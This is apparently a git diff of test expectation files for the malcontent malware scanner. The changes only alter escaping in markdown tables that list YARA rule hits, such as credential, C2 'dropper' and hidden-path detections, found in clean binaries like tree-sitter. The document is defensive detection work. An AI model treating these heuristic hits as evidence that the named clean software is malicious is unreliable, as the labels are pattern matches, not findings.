[password-protection](https://github.com/search?q=password-protection&type=code)
[passwordDialogTitle](https://github.com/search?q=passwordDialogTitle&type=code)
[passwordEchoEnabled](https://github.com/search?q=passwordEchoEnabled&type=code)
[password based MAC](https://github.com/search?q=password+based+MAC&type=code)
[GaiaPasswordReuse](https://github.com/search?q=GaiaPasswordReuse&type=code)
[PasswordGroupData](https://github.com/search?q=PasswordGroupData&type=code)
[challengePassword](https://github.com/search?q=challengePassword&type=code)
[fade-out-password](https://github.com/search?q=fade-out-password&type=code)
[such as passwords](https://github.com/search?q=such+as+passwords&type=code)
[current-password](https://github.com/search?q=current-password&type=code)
[password-manager](https://github.com/search?q=password-manager&type=code)
[SetPasswordFunc](https://github.com/search?q=SetPasswordFunc&type=code)
[like a password](https://github.com/search?q=like+a+password&type=code)
[password-change](https://github.com/search?q=password-change&type=code)
[password-reveal](https://github.com/search?q=password-reveal&type=code)
[passwordInvalid](https://github.com/search?q=passwordInvalid&type=code)
[reveal-password](https://github.com/search?q=reveal-password&type=code)
[PasswordIssues](https://github.com/search?q=PasswordIssues&type=code)
[PasswordReveal](https://github.com/search?q=PasswordReveal&type=code)
[input-password](https://github.com/search?q=input-password&type=code)
[password-store](https://github.com/search?q=password-store&type=code)
[passwordPrompt](https://github.com/search?q=passwordPrompt&type=code)
[passwordSubmit](https://github.com/search?q=passwordSubmit&type=code)
[password text](https://github.com/search?q=password+text&type=code)
[writePassword](https://github.com/search?q=writePassword&type=code)
[for password](https://github.com/search?q=for+password&type=code)
[get password](https://github.com/search?q=get+password&type=code)
[new-password](https://github.com/search?q=new-password&type=code)
[passwordChar](https://github.com/search?q=passwordChar&type=code)
[passwordEdit](https://github.com/search?q=passwordEdit&type=code)
[readPassword](https://github.com/search?q=readPassword&type=code)
[set password](https://github.com/search?q=set+password&type=code)
[userPassword](https://github.com/search?q=userPassword&type=code)
[PasswordH](https://github.com/search?q=PasswordH&type=code)
[bPassword](https://github.com/search?q=bPassword&type=code)
[kPassword](https://github.com/search?q=kPassword&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [PRIVATE_KEY](https://github.com/search?q=PRIVATE_KEY&type=code)
[private_key](https://github.com/search?q=private_key&type=code)
[privateKey](https://github.com/search?q=privateKey&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [crypto/aes](https://github.com/search?q=crypto%2Faes&type=code)
[AES](https://github.com/search?q=AES&type=code) | @@ -107,7 +107,7 @@ | LOW | [crypto/ecdsa](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa) | Uses the Go crypto/ecdsa library | [crypto/ecdsa](https://github.com/search?q=crypto%2Fecdsa&type=code) | | LOW | [crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519) | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | | LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [Public key](https://github.com/search?q=Public+key&type=code)
[Public-key](https://github.com/search?q=Public-key&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[public-key](https://github.com/search?q=public-key&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [require('tls')](https://github.com/search?q=require%28%27tls%27%29&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [require\('tls'\)](https://github.com/search?q=require%28%27tls%27%29&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code) | | LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | | LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | @@ -136,7 +136,7 @@ | LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | | LOW | [fs/file/append](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-append.yara#append_file) | appends to a file | [appendFile](https://github.com/search?q=appendFile&type=code) | | LOW | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_force) | Forcibly deletes files | [rm HP-USB500 5.1 Headset](https://github.com/search?q=rm+HP-USB500+5.1+Headset&type=code)
[rm PA-WL54GU](https://github.com/search?q=rm+PA-WL54GU&type=code) | -| LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open(](https://github.com/search?q=open%28&type=code) | +| LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open\(](https://github.com/search?q=open%28&type=code) | | LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [ReadFile](https://github.com/search?q=ReadFile&type=code) | | LOW | [fs/file/rename](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename) | renames files | [MoveFile](https://github.com/search?q=MoveFile&type=code) | | LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | @@ -158,7 +158,7 @@ | LOW | [fs/tempfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp) | creates temporary files | [temp file](https://github.com/search?q=temp+file&type=code)
[tmpfile](https://github.com/search?q=tmpfile&type=code) | | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code)
[bssid](https://github.com/search?q=bssid&type=code) | -| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require('dns')](https://github.com/search?q=require%28%27dns%27%29&type=code) | +| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require\('dns'\)](https://github.com/search?q=require%28%27dns%27%29&type=code) | | LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [resolv.conf](https://github.com/search?q=resolv.conf&type=code) | | LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | | LOW | [net/http](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http) | Uses the HTTP protocol | [HTTP](https://github.com/search?q=HTTP&type=code)
[http](https://github.com/search?q=http&type=code) | @@ -179,9 +179,9 @@ | LOW | [net/url/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle) | Handles URL strings | [URLContext](https://github.com/search?q=URLContext&type=code)
[new URL](https://github.com/search?q=new+URL&type=code) | | LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#getenv) | Retrieve environment variable values | [getenv](https://github.com/search?q=getenv&type=code) | | LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read) | reads from a file handle | [context.read()](https://github.com/search?q=context.read%28%29&type=code)
[reader.read()](https://github.com/search?q=reader.read%28%29&type=code)
[socket.read()](https://github.com/search?q=socket.read%28%29&type=code)
[stream.read()](https://github.com/search?q=stream.read%28%29&type=code)
[self.read()](https://github.com/search?q=self.read%28%29&type=code)
[tail.read()](https://github.com/search?q=tail.read%28%29&type=code)
[req.read()](https://github.com/search?q=req.read%28%29&type=code) | +| LOW | [os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read) | reads from a file handle | [context.read\(\)](https://github.com/search?q=context.read%28%29&type=code)
[reader.read\(\)](https://github.com/search?q=reader.read%28%29&type=code)
[socket.read\(\)](https://github.com/search?q=socket.read%28%29&type=code)
[stream.read\(\)](https://github.com/search?q=stream.read%28%29&type=code)
[self.read\(\)](https://github.com/search?q=self.read%28%29&type=code)
[tail.read\(\)](https://github.com/search?q=tail.read%28%29&type=code)
[req.read\(\)](https://github.com/search?q=req.read%28%29&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stream.write(kClearScreenDown)](https://github.com/search?q=stream.write%28kClearScreenDown%29&type=code)
[output.write(stringToWrite)](https://github.com/search?q=output.write%28stringToWrite%29&type=code)
[streamWritable.write(chunk)](https://github.com/search?q=streamWritable.write%28chunk%29&type=code)
[decoder.write(readBuffer)](https://github.com/search?q=decoder.write%28readBuffer%29&type=code)
[h2stream.write(buffer)](https://github.com/search?q=h2stream.write%28buffer%29&type=code)
[output.write(errStack)](https://github.com/search?q=output.write%28errStack%29&type=code)
[h2stream.write(chunk)](https://github.com/search?q=h2stream.write%28chunk%29&type=code)
[writable.write(chunk)](https://github.com/search?q=writable.write%28chunk%29&type=code)
[_downstream.write(e)](https://github.com/search?q=_downstream.write%28e%29&type=code)
[h2stream.write(body)](https://github.com/search?q=h2stream.write%28body%29&type=code)
[output.write(result)](https://github.com/search?q=output.write%28result%29&type=code)
[socket.write(buffer)](https://github.com/search?q=socket.write%28buffer%29&type=code)
[stream.write(string)](https://github.com/search?q=stream.write%28string%29&type=code)
[this.write(response)](https://github.com/search?q=this.write%28response%29&type=code)
[_decoder.write(ret)](https://github.com/search?q=_decoder.write%28ret%29&type=code)
[decoder.write(data)](https://github.com/search?q=decoder.write%28data%29&type=code)
[socket.write(chunk)](https://github.com/search?q=socket.write%28chunk%29&type=code)
[stdout.write(clear)](https://github.com/search?q=stdout.write%28clear%29&type=code)
[writer.write(chunk)](https://github.com/search?q=writer.write%28chunk%29&type=code)
[output.write(line)](https://github.com/search?q=output.write%28line%29&type=code)
[self.write(prefix)](https://github.com/search?q=self.write%28prefix%29&type=code)
[socket.write(body)](https://github.com/search?q=socket.write%28body%29&type=code)
[stream.write(data)](https://github.com/search?q=stream.write%28data%29&type=code)
[dest.write(chunk)](https://github.com/search?q=dest.write%28chunk%29&type=code)
[this.write(data)](https://github.com/search?q=this.write%28data%29&type=code)
[stdout.write(s)](https://github.com/search?q=stdout.write%28s%29&type=code)
[this.write(buf)](https://github.com/search?q=this.write%28buf%29&type=code)
[pt.write(val)](https://github.com/search?q=pt.write%28val%29&type=code) | +| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stream.write\(kClearScreenDown\)](https://github.com/search?q=stream.write%28kClearScreenDown%29&type=code)
[output.write\(stringToWrite\)](https://github.com/search?q=output.write%28stringToWrite%29&type=code)
[streamWritable.write\(chunk\)](https://github.com/search?q=streamWritable.write%28chunk%29&type=code)
[decoder.write\(readBuffer\)](https://github.com/search?q=decoder.write%28readBuffer%29&type=code)
[h2stream.write\(buffer\)](https://github.com/search?q=h2stream.write%28buffer%29&type=code)
[output.write\(errStack\)](https://github.com/search?q=output.write%28errStack%29&type=code)
[h2stream.write\(chunk\)](https://github.com/search?q=h2stream.write%28chunk%29&type=code)
[writable.write\(chunk\)](https://github.com/search?q=writable.write%28chunk%29&type=code)
[_downstream.write\(e\)](https://github.com/search?q=_downstream.write%28e%29&type=code)
[h2stream.write\(body\)](https://github.com/search?q=h2stream.write%28body%29&type=code)
[output.write\(result\)](https://github.com/search?q=output.write%28result%29&type=code)
[socket.write\(buffer\)](https://github.com/search?q=socket.write%28buffer%29&type=code)
[stream.write\(string\)](https://github.com/search?q=stream.write%28string%29&type=code)
[this.write\(response\)](https://github.com/search?q=this.write%28response%29&type=code)
[_decoder.write\(ret\)](https://github.com/search?q=_decoder.write%28ret%29&type=code)
[decoder.write\(data\)](https://github.com/search?q=decoder.write%28data%29&type=code)
[socket.write\(chunk\)](https://github.com/search?q=socket.write%28chunk%29&type=code)
[stdout.write\(clear\)](https://github.com/search?q=stdout.write%28clear%29&type=code)
[writer.write\(chunk\)](https://github.com/search?q=writer.write%28chunk%29&type=code)
[output.write\(line\)](https://github.com/search?q=output.write%28line%29&type=code)
[self.write\(prefix\)](https://github.com/search?q=self.write%28prefix%29&type=code)
[socket.write\(body\)](https://github.com/search?q=socket.write%28body%29&type=code)
[stream.write\(data\)](https://github.com/search?q=stream.write%28data%29&type=code)
[dest.write\(chunk\)](https://github.com/search?q=dest.write%28chunk%29&type=code)
[this.write\(data\)](https://github.com/search?q=this.write%28data%29&type=code)
[stdout.write\(s\)](https://github.com/search?q=stdout.write%28s%29&type=code)
[this.write\(buf\)](https://github.com/search?q=this.write%28buf%29&type=code)
[pt.write\(val\)](https://github.com/search?q=pt.write%28val%29&type=code) | | LOW | [os/kernel/netlink](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink) | communicate with kernel services | [netlink](https://github.com/search?q=netlink&type=code) | | LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | | LOW | [privesc/setuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/setuid.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md index 487c2159d..a39bb75fc 100644 --- a/tests/linux/clean/tree-sitter.md +++ b/tests/linux/clean/tree-sitter.md @@ -4,7 +4,7 @@ |:--|:--|:--|:--| | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[Darwin](https://github.com/search?q=Darwin&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[Darwin](https://github.com/search?q=Darwin&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | | MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code) | @@ -19,8 +19,8 @@ | MEDIUM | [net/socket/pair](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/pair.yara#socket_pair) | create a pair of connected sockets | [socketpair](https://github.com/search?q=socketpair&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [situationSecRandomCopyBytes](https://github.com/search?q=situationSecRandomCopyBytes&type=code)
[DisplayErrorgetrandom](https://github.com/search?q=DisplayErrorgetrandom&type=code)
[urandomInheritFdfatal](https://github.com/search?q=urandomInheritFdfatal&type=code)
[failureRtlGenRandom](https://github.com/search?q=failureRtlGenRandom&type=code)
[getRandomValues](https://github.com/search?q=getRandomValues&type=code)
[randomFillSync](https://github.com/search?q=randomFillSync&type=code)
[urandomfailed](https://github.com/search?q=urandomfailed&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgopythonswift](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgopythonswift)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.css](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.css)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.js](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.js)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.css](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.css)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.js](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.js)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://code.jquery.com/jquery](https://code.jquery.com/jquery)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://github.com/clap](https://github.com/clap)
[https://github.com/tree](https://github.com/tree)
[https://docs.rs/tree](https://docs.rs/tree) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgopythonswift](https%3A%2F%2Fbitbucket.org%2Fgrammar.js.gitignore.gitattributes.editorconfigcgopythonswift)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.css](https%3A%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Fclusterize.js%2F0.18.0%2Fclusterize.min.css)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.min.js](https%3A%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Fclusterize.js%2F0.18.0%2Fclusterize.min.js)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.css](https%3A%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Fcodemirror%2F5.45.0%2Fcodemirror.min.css)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.js](https%3A%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Fcodemirror%2F5.45.0%2Fcodemirror.min.js)
[https://github.com/ChimeHQ/SwiftTreeSitter](https%3A%2F%2Fgithub.com%2FChimeHQ%2FSwiftTreeSitter)
[https://code.jquery.com/jquery](https%3A%2F%2Fcode.jquery.com%2Fjquery)
[https://docs.rs/getrandom](https%3A%2F%2Fdocs.rs%2Fgetrandom)
[https://gitlab.com/https](https%3A%2F%2Fgitlab.com%2Fhttps)
[https://parser.cparser.h](https%3A%2F%2Fparser.cparser.h)
[https://github.com/clap](https%3A%2F%2Fgithub.com%2Fclap)
[https://github.com/tree](https%3A%2F%2Fgithub.com%2Ftree)
[https://docs.rs/tree](https%3A%2F%2Fdocs.rs%2Ftree) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86_64](https://github.com/search?q=x86_64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [getenv](https://github.com/search?q=getenv&type=code)
[HOME](https://github.com/search?q=HOME&type=code) | @@ -44,9 +44,9 @@ | LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | | LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | | LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https%3A%2F%2Fbitbucket.org%2Fgrammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https%3A%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Fclusterize.js%2F0.18.0%2Fclusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https%3A%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Fcodemirror%2F5.45.0%2Fcodemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https%3A%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Fcodemirror%2F5.45.0%2Fcodemirror.min.j)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https%3A%2F%2Fgithub.com%2Fclap-rs%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcar)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https%3A%2F%2Fgithub.com%2Fclap-rs%2Fclap%2Fissues%3D-%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fc)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https%3A%2F%2Ftree-sitter.github.io%2Ftree-sitter%2Fassets%2Fimages%2Ffavicon-16x16.png)
